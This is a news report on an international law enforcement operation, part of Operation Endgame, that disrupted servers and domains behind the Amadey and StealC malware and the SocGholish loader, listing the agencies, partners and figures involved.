A coordinated international law enforcement action has disrupted the infrastructure behind the Amadey and StealC malware families, knocking out hundreds of servers and domains used by cybercriminal networks worldwide.
Microsoft, Europol, and partners from multiple countries identified and seized, blocked, or sinkholed infrastructure tied to both malware operations. According to Europol, the action disrupted 326 servers and 142 domains. Investigators also linked more than €41 million in cryptocurrency to criminal activity and recovered approximately 27 million stolen credentials from over 385,000 compromised systems.
The operation also targeted SocGholish (also known as FakeUpdates), a malware loader that infects visitors through compromised websites serving fake browser update prompts.
Law enforcement agencies from Canada, Denmark, Germany, the Netherlands, the United Kingdom, and the United States participated, with Europol and Eurojust coordinating. Private-sector partners included Microsoft, ESET, Proofpoint, IBM X-Force, Bitsight, Infoblox, Orange Cyberdefense, Shadowserver, Have I Been Pwned, and Spamhaus.
Amadey is a malware botnet used by both ransomware gangs and state-sponsored groups to breach networks. StealC is an infostealer that harvests credentials, cryptocurrency wallets, and other sensitive data. Both are sold as malware-as-a-service, where affiliates pay for access to builders, management panels, and infrastructure.
StealC has recently been widely distributed through ClickFix attacks, including fake instructional videos on TikTok and FileFix attacks using steganography to deliver the payload. Microsoft’s Digital Crimes Unit identified more than 200 malicious command-and-control domains and IPs linked to both families.
The two malware families were tied to more than 140,000 infected devices during the first two weeks of May 2026 alone. ESET said the operation affected roughly 50 domains and nearly 200 active C2 servers.
This is the latest phase of Operation Endgame, which previously disrupted DanaBot, Bumblebee, Rhadamanthys, VenomRAT, Elysium, and SmokeLoader. Unless arrests are made, the threat actors commonly rebuild infrastructure and resume operations.
